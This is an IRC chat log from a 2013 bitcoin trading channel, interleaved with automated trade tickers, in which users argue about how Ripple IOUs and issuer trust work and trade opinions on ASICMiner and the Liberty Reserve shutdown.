only person afaik who seriously looked at the thing May 25 05:12:03 besides, he doesn't like me, so. May 25 05:13:43 To be fair on point #2, the issuer doesn't get anything either out of the issued IOUs. It's not like it requires you to lend them money. It's more like "pay to the bearer X silver/gold coins" IOUs, like early banks did, before state money. May 25 05:14:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.024997 = 0.075 BTC [-] May 25 05:14:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02456 = 0.0491 BTC [-] May 25 05:14:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.02455 = 0.0491 BTC [-] May 25 05:14:15 [BTCTC] [TAT.ASICMINER] 9 @ 0.02455 = 0.221 BTC [-] May 25 05:14:16 Where those paper IOUs are practical to go trade around without the need to burden yourself with carrying money all around May 25 05:14:17 [BTCTC] [TAT.ASICMINER] 28 @ 0.0245 = 0.686 BTC [-] May 25 05:14:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 25 05:14:21 [BTCTC] [TAT.ASICMINER] 46 @ 0.0245 = 1.127 BTC [-] May 25 05:14:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.024145 BTC [-] May 25 05:15:02 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [+] May 25 05:15:28 what do you mean doesn't get anything ? May 25 05:15:40 the fact that his debt is accepted is exactly giving him money. May 25 05:17:35 Those IOUs are no different than the balance at the exchange, which if it is showing 200 BTC, it means they owe you 200 BTC. They don't pay interest either on that balance. Same for Ripple IOUs. May 25 05:18:43 as far as i know, if your bank is showing 200 dollars in your account May 25 05:18:49 that bank is paying interest on the 200 May 25 05:19:07 The same apply for both thing, and often the trusted issuers are an exchange (at least for now) May 25 05:19:29 The difference is you expect the bank to invest your money round and make money on that. May 25 05:19:42 i don't care lol. May 25 05:19:52 as long as i take debt, ANY debt, i expect a % May 25 05:19:55 otherwise no deal. May 25 05:20:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.024998 = 0.1 BTC [+] May 25 05:20:16 presumably the entry/exit points to the network charge for the service? May 25 05:20:17 So you wouldn't deposit money in MtGox because they don't pay interest on your balance? May 25 05:20:54 Namworld i wouldn't deposit money in mtgox because the mtgox risk requires a premium May 25 05:21:05 if they credited my acct with ~300 bux for every 100 deposited i'd consider it. May 25 05:21:11 but as it is... never have, never will. May 25 05:21:58 Well it's pretty much the same. Bitstamp is an issuer on Ripple. You either have a number on BitStamp or on Ripple of have X of currency Y owed to you by them. May 25 05:22:11 So typically people wouldn't expect interest. May 25 05:22:44 but! when i accept this, i undertake someone's CP risk May 25 05:22:46 this has to be paid for. May 25 05:22:53 you can't pass along cp risk w/o fees ?! May 25 05:23:18 to rephrase : do you have an inkling of an idea what the 2008 meltdown would have looked like if indeed repo was free ? May 25 05:23:36 [BTCTC] [BASIC-MINING] 3 @ 0.5505 = 1.6515 BTC [+] May 25 05:24:04 Well history shows people are trusting 3rd parties with their funds all the time, expecting nothing in return. May 25 05:24:16 Other than being able to request their funds back May 25 05:24:25 "people". May 25 05:25:00 <[\\\]> "idiots" May 25 05:25:00 the developers stupidly assume this happens because never before have there been on the face of the earth genius developers to make a ripple. May 25 05:25:08 They expect gains in terms of service. In the US, interest-bearing demand accounts are practically dead. They pay out in service, usually ~1.5-3% of deposits on overhead. May 25 05:25:08 the real reason however is that the system doesn't work May 25 05:25:08 Namworld: example? May 25 05:25:17 and will be raped in the mouth just as soon as someone cares to. May 25 05:26:06 dub, pretty much every exchange. They won't give you anything for entrusting them your funds May 25 05:26:20 they give you access to a market for one May 25 05:26:22 Plus they'll even charge you when you do stuff with your funds on their system May 25 05:26:27 anyway, moral of the story here being, "don't start revolutionary financial shit without an actual financial mind available to suckle on the cock of" May 25 05:26:47 Well yeah... access to market is the only thing that is given in exchange May 25 05:27:07 its kinda of an important service May 25 05:27:19 its not like you would be handing them money without the intent to use the market May 25 05:27:37 mirce_popescu what do you mean by " system doesn't work" May 25 05:27:39 As for #3, I think you got your facts wrong... May 25 05:27:40 Though... they charge for that. May 25 05:27:45 depends dub, mtgox ? May 25 05:28:09 cole_albon i think you hafta read the scrollback. May 25 05:28:14 Namworld aha ? May 25 05:28:25 I might be mistaken... but I didn't notice any such chain trust effect May 25 05:28:52 <[\\\]> there's a reason why its called ripple May 25 05:28:59 <[\\\]> it implies a chain May 25 05:29:02 the scam bux switcharoo thing? May 25 05:29:15 Namworld what do you mean ?! May 25 05:29:21 you can't trade your ripples ? May 25 05:30:13 One BTC issued by Weexchange.co is different from 1 BTC issued by BitStamp. If you have 1 BTC issued by BitStamp, you can't trade it for someone wanting a Weexchange.co BTC May 25 05:30:14 cole_albon no, i meant the naive stone age "free rate repo" system May 25 05:30:32 Namworld so then what's a ripple ? May 25 05:30:41 Well I didn't notice any kind of mixing... May 25 05:30:49 Maybe if I had a more complex trust network... May 25 05:31:07 but! May 25 05:31:19 how did the tradefortress guy manage to cause all that havoc May 25 05:32:00 <[\\\]> http://l.yimg.com/os/publish-images/lifestyles/2013-05-24/925ca8be-299c-4c0e-8375-5d6c97916bce_630_plussize_swim.jpg May 25 05:32:06 He shows that he can have a 1 billion BTC balance by issuing it. May 25 05:32:21 but he also traded it May 25 05:32:26 my eyes May 25 05:32:28 But no one will accept it if they don't trust tradefortress as an issuer May 25 05:32:51 so ? May 25 05:34:01 So people must be careful about the issuers they trust? If you decide to trust some random guy for 10000 BTC and take his BTC... of course Ripple will show you have 10000 BTC, but try to trade those with anyone and no one takes them. May 25 05:35:14 right May 25 05:35:17 listen, the way i find out what the president of the republic ate May 25 05:35:19 [MPEX] [S.MPOE] 1620 @ 0.00072783 = 1.1791 BTC [+] May 25 05:35:20 [MPEX] [S.MPOE] 19500 @ 0.00072784 = 14.1929 BTC [+] May 25 05:35:32 is that his cook knows, and the cook fucks this girl on the side who's owned by this guy who owes me a carrot. May 25 05:35:36 [MPEX] [S.MPOE] 11580 @ 0.00072845 = 8.4355 BTC [+] May 25 05:35:44 this is how things work. social graphs degrade towards the edge May 25 05:36:14 [BTCTC] [BITVPS] 15 @ 0.000857 = 0.0129 BTC [-] May 25 05:36:43 this is another one of those Namworld conversations where we wax on for hours about how when one looks up they find the sky and shockingly upon looking down observe the ground May 25 05:37:00 lol May 25 05:37:12 That's not how I understand and witnessed Ripple to work. May 25 05:37:29 so listen. you got what, 40k ripples. where from ? May 25 05:37:48 It works exactly as in this graph, as far as I witnessed: https://ripple.com/wp-content/uploads/2012/12/how32.png May 25 05:38:06 [BTCTC] [GSDPT] 4 @ 0.00256 = 0.0102 BTC [+] May 25 05:38:14 From the giveaway thread, as I said. May 25 05:38:20 from whom ? May 25 05:38:23 [BTCTC] [S.MPOE-PT] 4 @ 0.000658 = 0.0026 BTC [-] May 25 05:38:29 a ripple user X shall we say ? May 25 05:38:41 from the ripple teat May 25 05:39:14 From Ripple I guess May 25 05:39:18 [BTCTC] [B.YABMC] 3 @ 0.0151 = 0.0453 BTC [-] May 25 05:39:32 mkay. May 25 05:39:34 Or any sub party assigned with the task of distributing the ripples around May 25 05:39:36 and then you took out 5 btc May 25 05:39:45 were these 5 btc put in by the user you got your ripples from / May 25 05:40:06 I trusted Bitstamp as an issuer. Then traded these XRPs for BitStamp issued BTC IOUs May 25 05:40:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.024146 = 0.0483 BTC [-] May 25 05:40:12 foprget that. May 25 05:40:16 user X gave you 40k ripple. May 25 05:40:21 user Y deposited 5 btc May 25 05:40:27 Aye May 25 05:40:29 you got Y's 5 btc in exchange for X's 40k ripple May 25 05:40:34 yeah May 25 05:40:38 thus there fore wtf you on about. it's exactly how you witnessed it to work May 25 05:41:00 But it doesn't work like you said in #3 May 25 05:41:10 ... May 25 05:41:15 You can't randomly end up with USD issued by your boss's little girl May 25 05:41:25 you took Y's lunch in exchange for X's scribbled paper. May 25 05:41:33 Y doesn't know who the fuck you are. May 25 05:41:41 all he knows is he had 5 btc May 25 05:41:44 and where are they. May 25 05:42:16 XRP is exclusively issued by Ripple May 25 05:42:22 ... May 25 05:42:27 So X's scribbled paper is Ripple May 25 05:42:44 dude. where are y's 5 btc May 25 05:42:51 In my wallet May 25 05:42:52 you don't even know who the fuck y is you have his btc May 25 05:43:01 so then how exactly is this diff from the guy in the cab. May 25 05:43:01 Yeah May 25 05:43:05 "somebody" has his 5 btyc May 25 05:43:47 In #3 the guy in the cab realizes suddenly he's holding valueless USD issued by a little girl May 25 05:44:01 Which is impossible if he never directly trusted said person as an issuer May 25 05:45:29 but he trusted his boss May 25 05:45:54 He didn't trust the little girl May 25 05:46:00 tghe boss did. May 25 05:46:03 There's no chain May 25 05:46:19 ... May 25 05:46:39 Issuer's X BTC is not mixable with Issuer's Y BTC May 25 05:46:54 if you were able to take out y's 5 btc in exchange for x's 40k ripples May 25 05:46:59 it stands to reason so could the little girl. May 25 05:47:12 so, little girl takes out 5 btc for her dad's 40k ripples. May 25 05:47:19 dad takes 5 btc out of you for 40k ripples May 25 05:47:25 you end up with 40k ripples. no 5 btc. May 25 05:47:53 [BTCTC] [ASICMINER-PT] 2 @ 2.483996 = 4.968 BTC [-] May 25 05:48:24 That's not how it work... the only way the little girl can take the 5 BTC is if she traded something for it. May 25 05:49:00 [BTCTC] [ASICMINER-PT] 3 @ 2.483997 = 7.452 BTC [+] May 25 05:49:37 I think you're talking about different things, Namworld is still talking about some idiot paying 5btc for his ripples while mircea_popescu is talking about how ripple works May 25 05:49:58 Either she's holding IOUs accepted by someone else (like Bank of America USD or whatever) and someone wants those IOUs in exchange of the BTC, or someone must trust her directly to issue IOUs May 25 05:50:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.024994 = 0.05 BTC [+] May 25 05:50:41 Namworld didnt extract 5btc from ripple, he extracted 5btc from the idiot via bitstamp May 25 05:50:48 Exactly... May 25 05:51:18 User uses BitStamp as a gateway. He gives bitstamp 5 BTC, which then gives that person a 5 BTC IOU issued by BitStamp. May 25 05:51:30 no May 25 05:51:45 ? May 25 05:51:47 idiot gives 5btc to YOU, you give him 40k xrp May 25 05:51:53 ripple had nothing to do with it May 25 05:51:59 bitstamp matched the trades May 25 05:52:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.024995 BTC [+] May 25 05:52:23 That's what I'm saying, for fuck sake, when did I included ripple in all this? May 25 05:52:51 you were just talking about gateways and IOUs in the last sentance May 25 05:53:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.024996 = 0.6249 BTC [+] May 25 05:53:01 that is ripplespeak May 25 05:53:03 Mr. Idiot gives BitStamp 5 BTC. BitStamp gives the user a 5 BTC on Ripple, issued by BitStamp. May 25 05:53:19 I decide to trust BitStamp's IOUs May 25 05:53:25 no you didnt May 25 05:53:31 ripple did not create any value, or take any effort to create.therefore in a proof of work/effort concept of monetary supply is worthless May 25 05:53:34 you withdrew in BTC May 25 05:53:52 Then I proceed to check the XRP to BitStamp BTC orderbook May 25 05:54:06 I see someone is offering 5 BTC BitStamp IOU for 40k XRP May 25 05:54:18 I decide to fill the order May 25 05:54:31 Ripple executes the trade, I get the guy's IOUs, he gets my XRP May 25 05:54:47 Namworld well ok, so then you are copiously unqualified to discuss how ripple works lol May 25 05:54:54 your experience is limited to how bitstamp works May 25 05:54:57 I then send BitStamp IOUs to BitStamp, including my BitStamp account # in some field May 25 05:55:12 Wheres BitStamp redeems their own IOUs May 25 05:55:31 why i dont want your IOU for a cheeseburger, thanks anyway May 25 05:55:52 How is it limited to how BitStamp works? May 25 05:56:11 and ripples are destroyed in each transaction May 25 05:56:20 going into a void May 25 05:56:41 that defies the laws of physics May 25 05:56:44 afaik they go to the authors May 25 05:56:58 [22:53] I decide to trust BitStamp's IOUs May 25 05:56:58 [22:53] no you didnt May 25 05:56:58 [22:53] you withdrew in BTC May 25 05:57:02 What is this nonsense? May 25 05:57:25 I can't get BitStamp's IOUs or withdraw anything without trusting BitStamp IOUs May 25 05:57:33 I read on their website they just go poof May 25 05:57:45 annd do not go anywher May 25 05:57:49 e May 25 05:58:01 [HAVELOCK] [ASICM] 129 @ 0.0252 = 3.2508 BTC [+] May 25 05:58:38 thats strange May 25 05:59:26 my favorite description of ripple as a system of tubes: https://bitcointalk.org/index.php?topic=176077.msg1869022#msg1869022 May 25 05:59:34 conservation of matter mass ftw May 25 05:59:48 mass i mean May 25 06:00:49 I think that scene from Dumb and Dumber explains ripple best May 25 06:01:56 … and bitcoin, and usd. May 25 06:02:10 the one where he is pissing on his cause it is on fire? May 25 06:02:14 http://www.youtube.com/watch?v=7GSXbgfKFWg May 25 06:02:15 leg May 25 06:02:30 jborkl: well, yeah the whole movie is pretty much it May 25 06:02:55 lol, or selling the dead parrot to the blind kid? May 25 06:04:51 [BTCTC] [ASICMINER-PT] 3 @ 2.46 = 7.38 BTC [-] May 25 06:05:01 [HAVELOCK] [ASICM] 317 @ 0.025212 = 7.9922 BTC [+] May 25 06:07:12 Guess I'll have to go back to Ripple and mess around, testing May 25 06:12:02 [HAVELOCK] [ASICM] 50 @ 0.02501 = 1.2505 BTC [-] May 25 06:15:02 [HAVELOCK] [ASICM] 1 @ 0.02450003 BTC [-] May 25 06:15:04 Ok, so I have purchased 0.01 BTC from Weexchange BTC orderbook and 0.01 BTC from Bitstamp BTC orderbook. I had 0.02 BTC in my account in balance summary. I then proceeded to place a 1 BTC sale order on the Weexchange BTC orderbook. May 25 06:15:44 Only 0.01 BTC shows up on the orderbook, regardless of the account holding 0.02 BTC and the order being for 1 BTC May 25 06:15:55 Because I only have 0.01 fucking Weexchange BTC May 25 06:16:01 [HAVELOCK] [ASICM] 26 @ 0.0242 = 0.6292 BTC [-] May 25 06:16:03 [HAVELOCK] [ASICM] 25 @ 0.0241 = 0.6025 BTC [-] May 25 06:16:06 and 0.01 Bitstamp BTC May 25 06:16:21 The various issuers' fund are not mixable... **** BEGIN LOGGING AT Sat May 25 13:45:44 2013 May 25 13:52:30 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 25 13:55:30 [MPEX] [S.MPOE] 12900 @ 0.00076528 = 9.8721 BTC [+] May 25 13:55:35 http://www.davidicke.com/headlines/84683-parking-tickets-issued-on-wrecks-while-stockholm-burns May 25 13:55:40 dude sweden really works. May 25 14:08:15 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [-] May 25 14:08:32 [MPEX] [S.MPOE] 1214 @ 0.00075973 = 0.9223 BTC [-] May 25 14:09:35 [BTCTC] [TAT.ASICMINER] 16 @ 0.024997 = 0.4 BTC [+] May 25 14:21:02 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [+] May 25 14:25:02 [HAVELOCK] [ASICM] 2 @ 0.0247 = 0.0494 BTC [+] May 25 14:26:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.024996 = 0.05 BTC [-] May 25 14:27:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.024996 = 0.075 BTC [-] May 25 14:27:30 [BTCTC] [TAT.ASICMINER] 39 @ 0.024997 = 0.9749 BTC [+] May 25 14:38:43 [MPEX] [S.MPOE] 9300 @ 0.00075973 = 7.0655 BTC [-] May 25 14:41:15 May 25 14:45:48 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] May 25 14:45:53 [MPEX] [S.MPOE] 4321 @ 0.00075992 = 3.2836 BTC [+] May 25 14:45:54 [MPEX] [S.MPOE] 15038 @ 0.00075973 = 11.4248 BTC [-] May 25 14:46:39 [MPEX] [S.MPOE] 4321 @ 0.00075973 = 3.2828 BTC [-] May 25 14:49:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.024996 = 0.1 BTC [-] May 25 15:06:51 help May 25 15:06:56 !help May 25 15:06:56 List of commands: May 25 15:06:57 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} May 25 15:06:58 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} May 25 15:06:59 !mp (desc: returns the response from MPEX order) May 25 15:07:00 !rules (desc: chan guidelines) {short: !r} May 25 15:07:01 !exchanges (desc: lists exchanges and brokers) {short: !e} May 25 15:11:05 ;;ticker May 25 15:11:09 BTCUSD ticker | Best bid: 128.29000, Best ask: 129.37234, Bid-ask spread: 1.08234, Last trade: 128.29000, 24 hour volume: 47920.23401049, 24 hour low: 127.80000, 24 hour high: 133.98000, 24 hour vwap: 130.65310 May 25 15:15:58 [BTCTC] [BITVPS] 9 @ 0.000857 = 0.0077 BTC [-] May 25 15:16:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.024801 = 0.0496 BTC [-] May 25 15:16:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] May 25 15:16:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] May 25 15:18:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4145 BTC [-] May 25 15:18:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4144 BTC [-] May 25 15:18:14 [BTCTC] [ASICMINER-PT] 1 @ 2.4143 BTC [-] May 25 15:18:16 [BTCTC] [ASICMINER-PT] 1 @ 2.4142 BTC [-] May 25 15:18:17 [BTCTC] [ASICMINER-PT] 1 @ 2.414 BTC [-] May 25 15:18:19 [BTCTC] [ASICMINER-PT] 1 @ 2.4122 BTC [-] May 25 15:18:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4051 BTC [-] May 25 15:18:25 [BTCTC] [ASICMINER-PT] 1 @ 2.405 BTC [-] May 25 15:18:28 [BTCTC] [ASICMINER-PT] 3 @ 2.402 = 7.206 BTC [-] May 25 15:19:47 [BTCTC] [S.DICE-PT] 4 @ 0.00335 = 0.0134 BTC [+] May 25 15:20:01 [HAVELOCK] [HIM] 1 @ 2.6001 BTC [-] May 25 15:21:02 [HAVELOCK] [ASICM] 54 @ 0.025 = 1.35 BTC [+] May 25 15:22:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 25 15:22:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 25 15:22:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 25 15:22:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 25 15:22:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.024372 = 1.2186 BTC [-] May 25 15:22:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.024372 = 0.6093 BTC [-] May 25 15:22:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.024371 = 1.2186 BTC [-] May 25 15:23:02 [HAVELOCK] [ASICM] 50 @ 0.02505 = 1.2525 BTC [+] May 25 15:25:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.02436 = 0.2436 BTC [-] May 25 15:25:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.024301 = 0.0972 BTC [-] May 25 15:26:08 [BTCTC] [TAT.ASICMINER] 8 @ 0.024301 = 0.1944 BTC [-] May 25 15:30:23 [MPEX] [S.MPOE] 2700 @ 0.00075558 = 2.0401 BTC [-] May 25 15:30:24 [MPEX] [S.MPOE] 8400 @ 0.00075492 = 6.3413 BTC [-] May 25 15:30:29 [MPEX] [S.MPOE] 1300 @ 0.00075421 = 0.9805 BTC [-] May 25 15:34:02 [BTCTC] [BITVPS] 1 @ 0.000858 BTC [+] May 25 15:34:51 hi all May 25 15:47:02 [HAVELOCK] [ASICM] 20 @ 0.02505 = 0.501 BTC [+] May 25 15:48:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.0247 = 0.0988 BTC [+] May 25 15:50:02 [HAVELOCK] [ASICM] 30 @ 0.02505 = 0.7515 BTC [+] May 25 15:51:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.0247 = 0.1482 BTC [+] May 25 15:57:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.024302 BTC [-] May 25 15:57:34 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 25 16:07:01 [HAVELOCK] [ASICM] 32 @ 0.0250999 = 0.8032 BTC [+] May 25 16:07:06 ;;ticker May 25 16:07:06 BTCUSD ticker | Best bid: 129.80501, Best ask: 130.39999, Bid-ask spread: 0.59498, Last trade: 130.39999, 24 hour volume: 46859.30230998, 24 hour low: 127.80000, 24 hour high: 133.98000, 24 hour vwap: 130.72146 May 25 16:07:26 OMG IT'S CRASHING! WE'RE ALL GONNA DIE! SELL, SELL, SELL! May 25 16:07:59 lol May 25 16:08:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.024888 BTC [+] May 25 16:09:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.024302 = 0.1701 BTC [-] May 25 16:09:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.024301 = 0.0729 BTC [-] May 25 16:17:47 [12:55] we'll be back at 128-129 May 25 16:19:02 [HAVELOCK] [ASICM] 4 @ 0.02505 = 0.1002 BTC [-] May 25 16:26:44 [BTCTC] [ASICMINER-PT] 1 @ 2.437999 BTC [+] May 25 16:26:46 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [+] May 25 16:30:02 [HAVELOCK] [ASICM] 20 @ 0.0245 = 0.49 BTC [-] May 25 16:30:03 [HAVELOCK] [ASICM] 54 @ 0.0243 = 1.3122 BTC [-] May 25 16:30:05 [HAVELOCK] [ASICM] 10 @ 0.02425 = 0.2425 BTC [-] May 25 16:30:06 [HAVELOCK] [ASICM] 21 @ 0.02420001 = 0.5082 BTC [-] May 25 16:30:07 [HAVELOCK] [ASICM] 155 @ 0.02420001 = 3.751 BTC [-] May 25 16:30:08 [HAVELOCK] [ASICM] 40 @ 0.0242 = 0.968 BTC [-] May 25 16:34:05 [BTCTC] [ASICMINER-PT] 1 @ 2.444 BTC [+] May 25 16:35:02 [HAVELOCK] [ASICM] 200 @ 0.025 = 5 BTC [+] May 25 16:35:03 [HAVELOCK] [ASICM] 100 @ 0.0251 = 2.51 BTC [+] May 25 16:36:19 [BTCTC] [ASICMINER-PT] 2 @ 2.444 = 4.888 BTC [+] May 25 16:45:02 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [+] May 25 16:47:02 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [+] May 25 16:48:54 [BTCTC] [ASICMINER-PT] 2 @ 2.444 = 4.888 BTC [+] May 25 16:52:02 [MPEX] [S.DICE] 1000 @ 0.00251225 = 2.5123 BTC [-] May 25 17:01:02 [HAVELOCK] [ASICM] 225 @ 0.025 = 5.625 BTC [-] May 25 17:02:02 [HAVELOCK] [ASICM] 9 @ 0.025 = 0.225 BTC [-] May 25 17:02:03 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] May 25 17:02:05 [MPEX] [S.MPOE] 11341 @ 0.00075833 = 8.6002 BTC [+] May 25 17:05:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4061 BTC [-] May 25 17:05:32 [BTCTC] [ASICMINER-PT] 1 @ 2.406 BTC [-] May 25 17:05:54 [BTCTC] [COGNITIVE] 2 @ 0.35 = 0.7 BTC [-] May 25 17:10:01 [HAVELOCK] [ASICM] 80 @ 0.0249 = 1.992 BTC [-] May 25 17:10:26 what is AM doing halving their hashrate like that? if its intentional thats one thing - if its a hardware flaw thats a problem May 25 17:16:45 [BTCTC] [BTC-BOND] 533 @ 0.01019 = 5.4313 BTC [+] May 25 17:17:56 [BTCTC] [BTC-BOND] 10 @ 0.0102 = 0.102 BTC [+] May 25 17:18:02 [BTCTC] [BTC-BOND] 35 @ 0.0102 = 0.357 BTC [+] May 25 17:18:05 [BTCTC] [BTC-BOND] 250 @ 0.0102 = 2.55 BTC [+] May 25 17:18:43 [BTCTC] [BTC-BOND] 21 @ 0.01021 = 0.2144 BTC [+] May 25 17:19:10 [BTCTC] [TAT.ASICMINER] 40 @ 0.0245 = 0.98 BTC [+] May 25 17:19:11 [BTCTC] [BTC-BOND] 5 @ 0.01023 = 0.0512 BTC [+] May 25 17:19:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.024147 BTC [-] May 25 17:20:01 [BTCTC] [TAT.ASICMINER] 6 @ 0.024147 = 0.1449 BTC [-] May 25 17:20:11 [BTCTC] [BTC-BOND] 1500 @ 0.01025 = 15.375 BTC [+] May 25 17:20:13 [BTCTC] [BTC-BOND] 35 @ 0.01025 = 0.3588 BTC [+] May 25 17:20:14 [BTCTC] [BTC-BOND] 10 @ 0.01025 = 0.1025 BTC [+] May 25 17:20:51 [BTCTC] [BTC-BOND] 1000 @ 0.0103 = 10.3 BTC [+] May 25 17:21:58 [BTCTC] [BTC-BOND] 10 @ 0.01035 = 0.1035 BTC [+] May 25 17:28:40 ;;ticker --last May 25 17:28:41 130.46896 May 25 17:36:08 [BTCTC] [ASICMINER-PT] 1 @ 2.4112 BTC [+] May 25 17:36:27 [BTCTC] [ASICMINER-PT] 2 @ 2.411 = 4.822 BTC [-] May 25 17:37:18 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] May 25 17:40:28 [BTCTC] [ASICMINER-PT] 1 @ 2.411 BTC [+] May 25 17:41:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.024146 = 0.0483 BTC [-] May 25 17:42:09 [BTCTC] [TAT.ASICMINER] 66 @ 0.024145 = 1.5936 BTC [-] May 25 17:43:30 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] May 25 17:43:41 !e May 25 17:43:59 ;;e May 25 17:44:00 Error: "e" is not a valid command. May 25 17:44:03 e May 25 17:44:24 !exchanges May 25 17:45:14 it pms you. May 25 17:45:16 !e May 25 17:45:18 yea May 25 17:46:54 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] May 25 17:48:06 !e May 25 17:48:28 thanks May 25 17:48:51 this is pretty cool May 25 17:50:02 [HAVELOCK] [ASICM] 80 @ 0.0249 = 1.992 BTC [-] May 25 17:50:41 !e May 25 17:51:00 no Bitfunder? May 25 17:51:10 thats what im sayin May 25 17:51:51 !e May 25 17:51:58 ThickAsThieves: im having the hardest time getting btc into my bitfunder May 25 17:52:20 wex completely choked on my signup email May 25 17:54:20 [BTCTC] [ASICMINER-PT] 1 @ 2.414 BTC [+] May 25 17:54:25 [BTCTC] [ASICMINER-PT] 5 @ 2.43 = 12.15 BTC [+] May 25 17:54:39 try this May 25 17:54:46 ditch your weex account May 25 17:54:50 and make a new one May 25 17:54:53 with a new addy May 25 17:54:59 yeah it completely choked :P May 25 17:55:13 you can only connect one weex to your bf May 25 17:55:17 but you can make many weex May 25 17:55:30 so just try again May 25 17:56:23 havent been able to get past signup May 25 17:56:49 liberty reserve got squished, eh? May 25 17:56:53 yep May 25 17:57:06 ukto is looking into it anyway, fingers crossed May 25 17:57:24 "“Budovsky’s businesses in Costa Rica apparently were financed by using money from child pornography websites and drug trafficking,” May 25 17:58:13 i wonder May 25 18:08:10 cute COG divs May 25 18:08:18 exactly Chaaang-Noi May 25 18:08:41 he probably ran a tor relay once so they are saying he funded his busiess via cp May 25 18:09:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [+] May 25 18:12:25 excellent idea May 25 18:14:23 lol, i think you should be able to pick up a drone online in the next 10 years May 25 18:14:51 execute order 66 May 25 18:15:42 http://www.geek.com/geek-pick/wasp-the-linux-powered-flying-spy-drone-that-cracks-wi-fi-gsm-netwokrs-1407741/ May 25 18:19:45 mircea_popescu, I'm gonna be one of those people to thank you for prying my eyes open after our conversation about AM yesterday May 25 18:19:49 the more I thought about it May 25 18:20:04 the more I dug into how correct you were May 25 18:20:19 and now totally agree May 25 18:21:06 AM's path must be to control and even insitigate the total commoditization of mining hardware May 25 18:22:00 while sorting a way to transcend the traditonal mining market May 25 18:22:14 parlaying their resources into a tertiary market May 25 18:22:39 like custom ASIC design, or government contracts for custom decryption or whatever May 25 18:22:55 paranainc: that's a helluva drone! May 25 18:23:11 !e May 25 18:23:47 the only saving grace i can suss for AM May 25 18:23:51 is that they are in CHina May 25 18:24:15 which makes it more likely that any notable competitor of theirs would have to also be there May 25 18:24:23 due to low costs May 25 18:24:39 Chaaang-Noi: at this scale they shouldnt be paying divs out, they should be reinvesting and trying to get their hands on as much hardware as possible, soon May 25 18:25:39 they need to be the vistaprint of mining May 25 18:25:44 and just gut everything May 25 18:25:51 including themselves May 25 18:25:57 for max profit May 25 18:26:16 the more they wait, the longer it will take for them to get started May 25 18:26:26 their only hope right now is to cash out big before the nethash skyrockets May 25 18:26:44 corollary: shut up and spend my money! May 25 18:27:29 small mining devices, cheap mining devices, May 25 18:27:38 ASICs in related producst May 25 18:27:40 like phones May 25 18:27:44 anyone know how many USB miners were sold? May 25 18:27:44 thats the way May 25 18:28:24 ThickAsThieves: agree!! May 25 18:28:28 [BTCTC] [ASICMINER-PT] 3 @ 2.407 = 7.221 BTC [-] May 25 18:28:45 just saturate the world May 25 18:28:49 and gtfo May 25 18:28:59 fiat500: but i dont think the divs are much to them really May 25 18:29:12 ericmuyser: they are even less to us May 25 18:29:14 yesterday I mentioned they could be like HP May 25 18:29:21 and didnt realize how right i was, May 25 18:29:22 fiat500: yah but it hypes their value May 25 18:29:26 much more than the actual divs May 25 18:29:34 because HP didnt want to the PC business after they got it May 25 18:29:44 they achieved max commoditization May 25 18:29:55 "i want 0.02 divs!" *buys in and loses 0.8 from the drop* May 25 18:29:57 and then wanted to move on to other types of biz May 25 18:29:59 but it gets em in May 25 18:30:35 lmfao May 25 18:31:47 right of course May 25 18:31:52 ThickAsThieves: its a bit of a stretch though, HP built hardware that people could do work/play on May 25 18:31:55 i.e. had a use May 25 18:32:18 a 300MH/s usb stick that generates < $1/month isnt that May 25 18:32:20 they should be doing that, more R&D May 25 18:32:40 [BTCTC] [TAT.ASICMINER] 11 @ 0.024146 = 0.2656 BTC [-] May 25 18:33:13 [BTCTC] [TAT.ASICMINER] 